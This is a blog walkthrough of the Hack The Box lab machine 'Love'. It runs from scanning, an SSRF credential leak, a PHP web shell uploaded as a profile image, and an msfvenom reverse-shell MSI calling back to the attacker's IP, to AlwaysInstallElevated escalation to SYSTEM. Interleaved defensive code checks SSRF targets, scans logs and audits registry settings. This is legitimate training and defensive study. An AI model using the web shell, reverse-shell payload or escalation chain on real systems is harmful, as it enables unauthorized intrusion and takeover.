Hack The Box - Love

2021-08-27

This is my first blog post ever! Welcome! The below is a walk-through of the HackTheBox machine, Love.

Initial Scans

This is the initial nmap scan I ran for this host.

  80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
  | http-cookie-flags: 
  |   /: 
  |     PHPSESSID: 
  |_      httponly flag not set
  |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
  |_http-title: Voting System using PHP
  135/tcp  open  msrpc        Microsoft Windows RPC
  139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
  443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
  |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
  |_http-title: 403 Forbidden
  | ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
  | Not valid before: 2021-01-18T14:00:16
  |_Not valid after:  2022-01-18T14:00:16
  |_ssl-date: TLS randomness does not represent time
  | tls-alpn: 
  |_  http/1.1
  445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
  3306/tcp open  mysql?
  | fingerprint-strings: 
  |   LPDString, ms-sql-s: 
  |_    Host '10.10.14.13' is not allowed to connect to this MariaDB server
  5000/tcp open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
  |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
  |_http-title: 403 Forbidden

I see staging.love.htb in the certificate, so I add it to my /etc/hosts file. Poking at the staging site, I find that its demo page accepts a URL and fetches it for you.

When I try to browse to http://10.10.10.239:5000 directly, I get a 403, so I put that URL into the staging demo instead and bam:

Vote Admin Creds admin: @LoveIsInTheAir!!!!
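The staging demo fetched an internal URL on my behalf, which is a server-side request forgery. As an added example (not code from the box or from this post), here is the destination check such a fetcher should run before making the request; `resolve` is an assumed hook for DNS lookups so the code runs offline.

```python
import ipaddress
from urllib.parse import urlsplit

# Ports a "fetch this URL for me" feature should be allowed to reach.
ALLOWED_PORTS = {80, 443}

def is_safe_fetch_target(url: str, resolve=None) -> bool:
    """Return True only if url points at a globally routable host on an allowed port.

    `resolve` maps a hostname to a list of IP strings (assumed helper, so the
    example runs offline with no DNS). In production, connect to the address you
    validated rather than re-resolving the name, so the answer cannot change
    between the check and the request.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False                      # file://, gopher:// and friends are rejected outright
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:                    # malformed or out-of-range port
        return False
    if port not in ALLOWED_PORTS:
        return False                      # would have blocked the :5000 staging listener
    try:
        addrs = [ipaddress.ip_address(parts.hostname)]
    except ValueError:                    # a hostname, not a literal IP: ask the resolver
        addrs = [ipaddress.ip_address(a) for a in (resolve(parts.hostname) if resolve else [])]
    # is_global is False for loopback, RFC 1918, link-local, 0.0.0.0 and similar ranges,
    # which covers the server's own addresses as well as anything else on the LAN.
    return bool(addrs) and all(a.is_global for a in addrs)
```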

I also run gobuster on http://10.10.10.239 and find a /admin directory. Navigating to that, I see a similar Voter login, so I try the credentials I found. I'm logged in!

The rest of my gobuster output shows:

      /images               (Status: 301) [Size: 338] [--> http://10.10.10.239/images/]
      /index.php            (Status: 200) [Size: 4388]                                 
      /home.php             (Status: 302) [Size: 0] [--> index.php]                    
      /login.php            (Status: 302) [Size: 0] [--> index.php]                    
      /Images               (Status: 301) [Size: 338] [--> http://10.10.10.239/Images/]
      /admin                (Status: 301) [Size: 337] [--> http://10.10.10.239/admin/] 
      /Home.php             (Status: 302) [Size: 0] [--> index.php]                    
      /plugins              (Status: 301) [Size: 339] [--> http://10.10.10.239/plugins/]
      /includes             (Status: 301) [Size: 340] [--> http://10.10.10.239/includes/]
      /Index.php            (Status: 200) [Size: 4388]                                   
      /Login.php            (Status: 302) [Size: 0] [--> index.php]                      
      /examples             (Status: 503) [Size: 402]                                    
      /logout.php           (Status: 302) [Size: 0] [--> index.php]                      
      /preview.php          (Status: 302) [Size: 0] [--> index.php]                      
      /dist                 (Status: 301) [Size: 336] [--> http://10.10.10.239/dist/]    
      /licenses             (Status: 403) [Size: 421]                                    
      /IMAGES               (Status: 301) [Size: 338] [--> http://10.10.10.239/IMAGES/]  
      /%20                  (Status: 403) [Size: 302] 

User.txt

Browsing to http://10.10.10.239/images/, I notice that the site's images are served from this directory. Since I can upload an image as my profile picture, I try uploading a PHP file instead to get a simple web shell.

I type up this quick PHP file:

  <?php
  system($_GET['k']);
  ?>

After uploading it as my profile picture, I request it from the images directory with a command in the k parameter:

http://10.10.10.239/images/love.php?k=whoami
love\phoebe

Success! I now have a web shell that I can use for RCE.

http://10.10.10.239/images/love.php?k=type%20C:\Users\Phoebe\Desktop\user.txt

user.txt: b6287d277e097744b3bf61a9cffa784d
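From the defender's side, the requests above leave a clear trail in Apache's access log. As an added example (not from this post), here is a small scanner that flags scripts executed from the uploads directory and pulls out the commands passed in the query string; the log lines are constructed to mirror the walkthrough's requests, not captured from the box.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Directories that should only ever serve static uploads, and extensions
# Apache/PHP will execute instead of serve.
UPLOAD_DIRS = ("/images/",)
EXEC_EXTS = (".php", ".phtml", ".phar", ".php5")

# Apache combined log format; only the request line, status and size are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

def inspect_line(line: str):
    """Return a finding for a script executed from an upload directory, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # Lower-case first: the Windows filesystem served /images, /Images and /IMAGES alike.
    path = parts.path.lower()
    if not path.startswith(UPLOAD_DIRS) or not path.endswith(EXEC_EXTS):
        return None
    # Any script under /images/ is a finding; a query string on it is the
    # operator passing commands in, so rate that higher.
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "path": parts.path,
        "status": int(m.group("status")),
        "params": params,
        "severity": "high" if params else "medium",
    }

def scan(lines):
    """Run inspect_line over an iterable of log lines and keep only the findings."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample log lines (not taken from the box), modelled on the
# requests made in the walkthrough plus two benign ones.
SAMPLE_LOG = [
    '10.10.14.13 - - [29/Jun/2021:21:00:01 -0400] "GET /images/profile.jpg HTTP/1.1" 200 4096',
    '10.10.14.13 - - [29/Jun/2021:21:00:02 -0400] "GET /admin/home.php HTTP/1.1" 200 4388',
    '10.10.14.13 - - [29/Jun/2021:21:01:10 -0400] "GET /images/love.php?k=whoami HTTP/1.1" 200 12',
    '10.10.14.13 - - [29/Jun/2021:21:02:15 -0400] "GET /images/love.php?k=type%20C:\\Users\\Phoebe\\Desktop\\user.txt HTTP/1.1" 200 33',
]
```

The real fix is upstream of the log: store uploads outside the web root or in a directory where script execution is disabled, and validate the file type rather than trusting the extension.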

Access

I now use the web shell's command execution to upload and run a Meterpreter shell. The handler options:

  Payload options (windows/x64/meterpreter_reverse_tcp):

     Name        Current Setting  Required  Description
     ----        ---------------  --------  -----------
     EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, process, none)
     EXTENSIONS                   no        Comma-separate list of extensions to load
     EXTINIT                      no        Initialization strings for extensions
     LHOST       10.10.14.13      yes       The listen address (an interface may be specified)
     LPORT       4444             yes       The listen port


  Exploit target:

     Id  Name
     --  ----
     0   Wildcard Target


  msf6 exploit(multi/handler) > run

  [*] Started reverse TCP handler on 10.10.14.13:4444 
  [*] Meterpreter session 1 opened (10.10.14.13:4444 -> 10.10.10.239:59663) at 2021-06-29 21:04:05 -0400

  meterpreter > getuid
  Server username: LOVE\Phoebe

Root.txt

Running post/multi/recon/local_exploit_suggester, I see that the AlwaysInstallElevated policy is suggested.

Following this article, I make an MSI payload with msfvenom: https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.13 lport=1234 -f msi -o shell.msi

I open a second Metasploit tab and start a handler with the options above (LHOST 10.10.14.13, LPORT 1234).

Then in my original session, I run:

  meterpreter > upload shell.msi

  meterpreter > shell

  msiexec /quiet /qn /i shell.msi

In my second meterpreter listener:

  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter > cat root.txt
  3bdedfec180220588404e92061564735

root.txt: 3bdedfec180220588404e92061564735
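Checking for this misconfiguration from the defensive side, as an added example (not from this post or the linked article): the script parses `reg query` output for both hives and only reports the path as exploitable when both values are 1, which is the condition Windows Installer actually requires. `query_live`, the GPO text and the sample outputs are my own constructs, not captured from the box.

```python
import re
import subprocess
import sys

# Windows Installer runs an MSI as SYSTEM only when AlwaysInstallElevated is 1
# under BOTH hives; one hive alone is a misconfiguration, not the escalation path.
INSTALLER_KEYS = {
    "HKLM": r"HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer",
    "HKCU": r"HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer",
}
VALUE_RE = re.compile(r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9A-Fa-f]+)\s*$", re.M)
GPO_FIX = ("Disable 'Always install with elevated privileges' under Administrative Templates > "
           "Windows Components > Windows Installer in both Computer and User Configuration")

def parse_always_install_elevated(reg_query_output: str):
    """Pull the DWORD out of `reg query ... /v AlwaysInstallElevated` text; None if absent."""
    m = VALUE_RE.search(reg_query_output)
    return int(m.group(1), 16) if m else None

def evaluate(hklm_output: str, hkcu_output: str) -> dict:
    """Combine both hives into a verdict; 'fix' is set whenever either hive is enabled."""
    hklm = parse_always_install_elevated(hklm_output)
    hkcu = parse_always_install_elevated(hkcu_output)
    return {
        "HKLM": hklm,
        "HKCU": hkcu,
        "exploitable": hklm == 1 and hkcu == 1,
        "fix": GPO_FIX if (hklm == 1 or hkcu == 1) else None,
    }

def query_live() -> dict:
    """Run reg.exe on the local host (assumed helper; only meaningful on Windows)."""
    if sys.platform != "win32":
        raise RuntimeError("reg.exe is only available on Windows")
    outputs = {}
    for hive, key in INSTALLER_KEYS.items():
        # reg.exe exits non-zero and prints an error when the value is missing;
        # the parser returns None for that, so no special-casing is needed here.
        proc = subprocess.run(["reg", "query", key, "/v", "AlwaysInstallElevated"],
                              capture_output=True, text=True)
        outputs[hive] = proc.stdout + proc.stderr
    return evaluate(outputs["HKLM"], outputs["HKCU"])

# Constructed sample outputs in the shape reg.exe prints (not captured from the box).
SAMPLE_HKLM_ON = ("\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\r\n"
                  "    AlwaysInstallElevated    REG_DWORD    0x1\r\n\r\n")
SAMPLE_HKCU_ON = SAMPLE_HKLM_ON.replace("HKEY_LOCAL_MACHINE", "HKEY_CURRENT_USER")
SAMPLE_ABSENT = "\r\nERROR: The system was unable to find the specified registry key or value.\r\n"
```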

Thank you for reading!

Want to Contact Me?

You can find me on Twitter or LinkedIn if you have any questions or just want to connect!
If you're curious where I've worked or what skills I've acquired over the years, I've linked my resume.